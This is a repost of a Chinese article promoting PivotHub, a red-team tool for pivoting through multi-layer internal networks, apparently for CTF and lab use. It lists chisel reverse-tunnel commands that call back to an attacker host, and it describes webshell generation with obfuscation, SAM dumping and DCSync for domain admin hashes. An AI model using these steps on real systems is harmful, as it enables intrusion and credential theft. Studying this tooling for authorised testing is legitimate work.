PivotHub·链透中枢—多层内网渗透辅助工具|CTF、内网渗透、攻防

admin 2026-09-23 05:51:05 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍PivotHub多层内网渗透辅助工具,基于Vue3与FastAPI构建,提供Shell管理、代理编排、网络拓扑、凭据库等功能,支持三层内网演示项目。文章末尾引导关注公众号获取下载链接,属于工具推广软文,建议读者谨慎评估工具安全性与合规性。 综合评分: 30 文章分类: 内网渗透,红队,渗透测试,软文广告


PivotHub · 链透中枢 — 多层内网渗透辅助工具 | CTF、内网渗透、攻防

ProbiusOfficial ProbiusOfficial

夜组安全

2026年9月22日 07:30 青海

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

免责声明

由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!所有工具安全性自测!!!VX:NightCTI

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把夜组安全设为星标”,否则可能就看不到了啦!

依据《多层内网渗透辅助工具 · 产品设计文档(PRD)v1.0》实现。 技术栈:Vue 3(本地化全局构建)+ ECharts 5(Graph 拓扑)+ 原生 CSS,后端 FastAPI + SQLite + WebSocket。 数据全部来自本地后端:python -m pivothub 启动后,前端经 REST + WebSocket 读写 SQLite; 后端不可用时界面显式报错,不用假数据兜底

🌐 项目介绍页:https://probiusofficial.github.io/pivothub/(能力总览 · 界面预览 · 真机评测速览)

界面预览

以下截图取自空库首次启动播种的演示项目(§4),运行于 python run.py + 浏览器。

阶段看板 · 进度总览与链路健康

网络拓扑 · 跳板链(节点 = 主机,边 = 代理链路,按网段分区着色)

快速开始

环境要求

| 项 | 要求 | | — | — | | Python | 3.10+(本机实测 3.13) | | 依赖 | pip install -r requirements.txt (FastAPI / Uvicorn / SQLAlchemy / Pydantic…) | | 可选 | Docker(跑 scripts/lab/ 靶场做全流程真机验证) | | 浏览器 | 任意现代浏览器(前端零构建,Vue / ECharts 已本地化于 assets/vendor/) |

三步启动(后端一体化托管前端)

pip install -r requirements.txt
python run.py            # 等价 python -m pivothub,监听 127.0.0.1:8000
# 浏览器打开 http://127.0.0.1:8000/

后端以 StaticFiles 原样托管前端,/api/* 与 /ws 同源,无需另起静态服务器。 数据全部来自本地 SQLite;后端不可用时界面显式报错。

首次打开会弹出合规声明(PRD §5 合规要求),顶栏另有常驻入口。 空库首次启动会按 data/seed_project.json 播种一场三层内网演示项目(见 §4),库非空则不动。

常用环境变量(均定义在 pivothub/config.py):

| 变量 | 默认 | 说明 | | — | — | — | | PIVOTHUB_PORTPIVOTHUB_HOST | 8000127.0.0.1 | 监听端口 / 地址(仅允许回环,有断言硬约束) | | PIVOTHUB_DB_PATH | <根>/pivothub.db | SQLite 路径(WAL) | | PIVOTHUB_DATA_DIR | <根>/data | 数据目录(命令库 / 技法库 / 种子项目 / 插件) | | PIVOTHUB_STAGE_BIND_PORT / _TTL | 0.0.0.0 / 随机 / 15 分钟 | 文件暂存 HTTP 服务(上传「HTTP 拉取」通道) | | PIVOTHUB_PLUGIN_REGISTRY | data/plugins/registry.json | 插件清单来源(可指向远程清单) |

前端资源已本地化(离线可用)

index.html 引用的是 assets/vendor/ 下的 Vue 3 与 ECharts,不依赖 CDN,断网环境可直接使用; ECharts 缺失时仅拓扑图降级,其余界面不受影响(app.js 另有 Vue 加载失败提示)。

只想调界面?

用任意静态服务器打开本目录(如 python -m http.server 8777)即可看 UI, 但没有 /api 与 /ws 时面板会显式提示后端不可用(不会退化成假数据)。

演示数据说明

空库首次启动时按 data/seed_project.json 播种一场三层内网 CTF 演示项目(库非空不会覆盖):

| 层级 | 网段 | 主机 | 关键剧情 | | — | — | — | — | | VPN | 192.0.2.0/24 | 攻击机 192.0.2.10(tun0) | 通过 VPN 接入靶场网络,靶机回连到该地址 | | L1 | 192.168.100.0/24 | web-dmz-01(双网卡 192.168.100.2/10.85.101.3) / web-dmz-02 / db-dmz | 任意文件上传拿入口马 → chisel 反向 Socks | | L2 | 10.85.101.0/24 | app-int-01(双网卡 10.85.101.4/172.56.102.4) / app-int-02 / file-int | Tomcat war 部署、ASPX 马、SAM dump | | L3 | 172.56.102.0/24 | DC01 / SRV-SQL / srv-ops | 域控、DCSync 拿域管哈希 |

  • 5 个 Shell 会话(含 1 个断线示例、1 个已固化示例)
  • 5 条代理链路,覆盖三种链路类型:Socks 代理单端口转发多级中继(含 1 条失败链路)
  • 7 条凭据、5 个 Flag、17 条时间线事件、命令模板与终端固化技法若干

推荐演示路径:拓扑点节点 → 开终端 → 交互能力检测 → 执行 Python PTY → stty raw 收尾 → 出网探测 → 选跳板机 + 链路类型生成命令(切到 L2 双网卡机会自动推导多级中继)→ 切自动档一键部署(观察链路数 +1)→ 拓扑新增边 → 凭据库看复用推荐 → Flag 墙 → 导出 Markdown。

代理编排台的编排逻辑

攻击机网络:面板不假设攻击机是 127.0.0.1。攻击机通过 VPN 接入靶场网络时,靶机必须回连到攻击机的靶场网段地址(本例 192.0.2.10),顶栏「全局设置」可修改该地址,所有命令模板都用它替换。

三种链路类型(选跳板机后自动推荐,也可手动切换):

| 类型 | 适用场景 | 生成的命令(示例) | | — | — | — | | Socks 代理 | 要访问某网段的所有资产 | ./chisel client 192.0.2.10:1331 R:0.0.0.0:10006:socks | | 单端口转发 | 只明确知道某一个IP:端口 服务 | ./chisel client 192.0.2.10:1331 R:0.0.0.0:10001:10.85.101.3:80 | | 中继穿透(多级) | 下层无法直连攻击机,需经上层内网口 | 见下方三步 |

多级中继的自动推导:选中 L2 双网卡机 10.85.101.4 时,面板识别出「该网段无法直连攻击机」+「该主机双网卡可通 L3」,于是自动:

  1. 把链路类型切为「中继穿透」;
  2. 目标网段取第二块网卡所在段 172.56.102.0/24(而不是它自己所在的段);
  3. 推导出中继入口地址 10.85.101.3:1331(上一层跳板在本层网段里的那个 IP);
  4. 生成三步命令并分步展示,每步可单独「发送到该节点终端」:
# ① 攻击机 192.0.2.10
./chisel server -p 1331 --reverse
# ② L1 入口机(把隧道端口暴露到内网口)
./chisel client 192.0.2.10:1331 1331:1331
# ③ L2 双网卡机(经内网口回连,穿透到 L3)
./chisel client 10.85.101.3:1331 R:0.0.0.0:10005:socks

拓扑图上的链路按类型着色:Socks 绿色实线、多级中继紫色虚线、端口转发橙色实线、断开红色虚线。

功能一览(PRD 对照)

| PRD 编号 | 需求 | UI 落点 | 状态 | | — | — | — | — | | M1-1 | Webshell 生成器(PHP/JSP/ASP/ASPX + 混淆模板) | 马生成器 · 5 种混淆模板实时切换 | ✅ | | M1-2 | Shell 连接管理(登记 / 测试 / 心跳 / 断线标记) | Shell 管理 · 表格 + 添加弹窗 | ✅ | | M1-3 | 虚拟终端(命令 / 回显 / 历史 / Tab 补全) | Shell 管理 · 下方终端;反弹会话自动进入原始交互模式(直连目标 PTY) | ✅ | | M1-4 | 文件管理(浏览 / 上传 / 下载 / 编辑) | 文件管理 + Shell 右侧紧凑面板;上传支持 HTTP 拉取 与 分片直传 双通道 | ✅ | | M1-5 | 自定义马协议 + 基础信息自动回传入库 | 生成器「自定义加密马」+ 添加 Shell 的「自动回传」 | ✅ | | M1-6 | Shell 注入辅助(写马姿势速查 + 一键尝试) | 马生成器 · 底部写马卡片(SQL / 日志 / 包含 / SSTI / 上传绕过) | ✅ | | M1-8 | 终端固化(WebShell 伪终端 → 稳定交互 TTY) | Shell 管理 · 「终端固化」弹窗:检测 + 技法库 + 一键固化 + stty raw 收尾(§5) | ✅ | | M2-1 | 八款工具 Adapter 集成 | 代理编排台 · 工具下拉(chisel / frp / Neo-reGeorg 已接入,其余下线占位) | 🟡 3/8 | | M2-2 | 出网探测 + 隧道推荐 | 代理编排台 · ICMP/DNS/HTTP/TCP 四探针 + 结论 / 推荐 / 备选 / 理由 | ✅ | | M2-3 | 两档自动化(半自动 / 自动档) | 顶栏档位开关;自动档含上传→执行→回连→登记全流程与失败降级 | ✅ | | M2-4 | 多级串联编排 | 编排区自动继承上一层 Socks 入口,生成「串联参数」 | ✅ | | M2-5 | 统一 Socks 入口映射表 | 代理编排台 · 本地端口 → 目标网段映射表 | ✅ | | M2-6 | proxychains / msf 联动 | 顶栏两个按钮,生成配置并在面板内预览 | ✅ | | M2-7 | 隧道类型覆盖 | 各工具模板区分 Socks5 / HTTP / 端口转发 / TUN | ✅ | | M2-8 | 代理健康看板(延迟 / 流量 / 断链重拉) | 代理编排台 · 状态点 + 延迟 + 流量 + 检查 / 重拉 / 销毁 | 🟡 断链自动重拉未实现 | | M3-1 | 资产列表 | 资产列表 · 表格 + 筛选 + 登记 / 导入 / 移除(级联清理) | ✅ | | M3-1+ | 资产探测(内网信息收集 + 扫描器扫内网) | 资产探测 · 信息收集 → fscan 扫描(流式日志、可取消)→ 勾选导入 | ✅ | | M3-2 | 网络拓扑图(核心界面) | 网络拓扑 · ECharts Graph,节点 / 边 / 详情侧栏 / 操作面板 | ✅ | | M3-3 | 凭据库 + 复用推荐 | 凭据库 · 表格 + 右侧复用推荐(按网段 / 域 / 服务打分) | ✅ | | M3-4 | 攻击路径 / 操作时间线 | 操作时间线 · 自动事件 + 手动笔记(Markdown) | ✅ | | M3-5 | 网段管理 + 分区着色 | 拓扑按网段配色 + 右侧网段分区列表 | ✅ | | M4-1 | Flag 收集墙 | Flag 收集墙 · 卡片墙 + 进度环 + 阶段进度 + 一键复制提交 | ✅ | | M4-2 | 内嵌 Markdown 笔记 | 时间线「添加笔记」+ Markdown 渲染 | ✅ | | M4-3 | 比赛计时 / 阶段看板 | 顶栏倒计时 + 阶段看板(已控主机 / 层级 / Flag / 剩余时间) | ✅ | | M4-4 | Writeup 半自动生成 | 复盘导出 · MD / HTML / JSON 三格式 + 选项 + 实时预览 + 下载 | ✅ | | M5-1 | 红队命令速查库 | 命令速查 · 分类 + 搜索 + 变量替换 + 发送到终端 | ✅ | | M5-2 | 智能建议:按当前主机 OS / 权限 / 内核版本推荐提权路径 | 命令速查 · 「提权智能匹配」(真实采集 → 规则命中 → 证据 + 建议命令) | ✅ | | M6-1 | SQLite 持久化 / 多项目 | 顶栏项目切换器 + 后端新建项目;数据落 SQLite | ✅ | | M6-2 | 导出三格式 | 复盘导出 | ✅ | | M6-3 | 项目导入 / 导出打包 | 复盘导出 · 「打包项目」按钮 | 🟡 界面就绪 | | — | 合规声明(§5) | 启动弹窗 + 顶栏常驻入口 | ✅ |

工具获取

点击关注下方名片进入公众号

回复关键字【260922】获取下载链接

往期精彩

往期推荐

CNVD 通用型未授权漏洞广扫Skill · 便携工具包

渗透武器库、渗透工具箱 | 专为渗透测试从业者开发的一站式工具启动器

AI 驱动的自动化渗透测试平台 | AI漏洞挖掘系统 – 黑板架构 / 模型分级 / 结果验证铁律

DSH RedTeam 模式:红队作战指挥台——一个靶标名称拉起信息收集/漏洞检测/漏洞利用/内网渗透四个角色

GitHub C2红队指挥平台 MCP接入AI,全自动渗透必备


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:夜组安全 ProbiusOfficial ProbiusOfficial《PivotHub · 链透中枢 — 多层内网渗透辅助工具 | CTF、内网渗透、攻防》

评论:0   参与:  0